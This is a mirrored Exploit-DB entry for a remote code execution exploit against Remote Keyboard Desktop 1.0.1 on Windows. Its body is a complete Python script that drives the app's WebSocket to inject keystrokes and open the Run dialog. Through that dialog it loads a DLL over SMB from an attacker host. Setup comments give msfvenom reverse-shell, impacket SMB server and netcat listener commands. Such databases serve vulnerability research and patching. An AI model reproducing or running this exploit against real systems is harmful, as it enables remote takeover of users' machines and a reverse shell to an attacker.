Remote Keyboard Desktop 1.0.1 – Remote Code Execution (RCE)

• Exploit Database
• 7 阅读

• 作者： Chokri Hammedi
  日期： 2025-05-21
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/52299/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133

  # Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) # Date: 05/17/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://remotecontrolio.web.app/ # Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare # Version: 1.0.1 # Tested on: Windows 10 Pro Build 19045   # Start Remote Keyboard Desktop on your windows # Preparing: # # 1. Generating payload (dll/exe): # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll # 2. Start smb server: impacket-smbserver SHARE . -smb2support # 3. nc -lnvp 8080 # 4. python exploit.py #####   #!/usr/bin/env python3   import websocket import json import time   target = "192.168.8.105" lhost = "192.168.8.101" WS_URL = f"ws://{target}:8080/" payload = "shell2.dll" # payload dll/exe filename debug = False   HEADER_LIST = [ "User-Agent: Dart/3.7 (dart:io)", f"Origin: http://{target}:8080", "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits" ]   #SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based   SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll based   special_mapping = { ' ': ("SPACE", False), '/': ("NUMPAD_DIVIDE", False), '\\': ("\\", False), '.': ("NUMPAD_DECIMAL", False), ',': (",", False), }   def send_key_event(ws, key, key_down): event = {"command": "keyboard_event", "data": {"key": key, "keyDown": key_down, "capsLock": False}} ws.send(json.dumps(event))   def send_text(ws, text, delay=0.05): shift_pressed = False for ch in text: if ch in special_mapping: key_name, need_shift = special_mapping[ch] elif ch.isalpha(): need_shift = ch.isupper() key_name = ch.upper() elif ch.isdigit(): key_name = ch need_shift = False else: raise ValueError(f"No key mapping for character: {ch!r}")   if need_shift and not shift_pressed: send_key_event(ws, "SHIFT", True) shift_pressed = True elif not need_shift and shift_pressed: send_key_event(ws, "SHIFT", False) shift_pressed = False   send_key_event(ws, key_name, True) send_key_event(ws, key_name, False) time.sleep(delay)   if shift_pressed: send_key_event(ws, "SHIFT", False)   def send_key(ws, keys, delay=0.05): for key in keys: send_key_event(ws, key, True) time.sleep(delay) for key in reversed(keys): send_key_event(ws, key, False)   def on_open(ws): print ("Let's start!")   send_key(ws, ["LEFT_WINDOWS", "R"]) time.sleep(0.5)   send_text(ws, SMB_PATH) send_key(ws, ["RETURN"]) print ("Executing...") time.sleep(1.2)   print("Check your listener!") if debug:   print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m ")   ws.close()   def on_message(ws, message): if debug: print("[=] Received:", message)   def on_error(ws, error): if debug: print("[!] Error:", error)   def on_close(ws, code, reason): if debug: print(f"[x] Closed: {code} - {reason}")   if __name__ == "__main__": websocket.enableTrace(debug) ws = websocket.WebSocketApp( WS_URL, header=HEADER_LIST, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close )   ws.run_forever()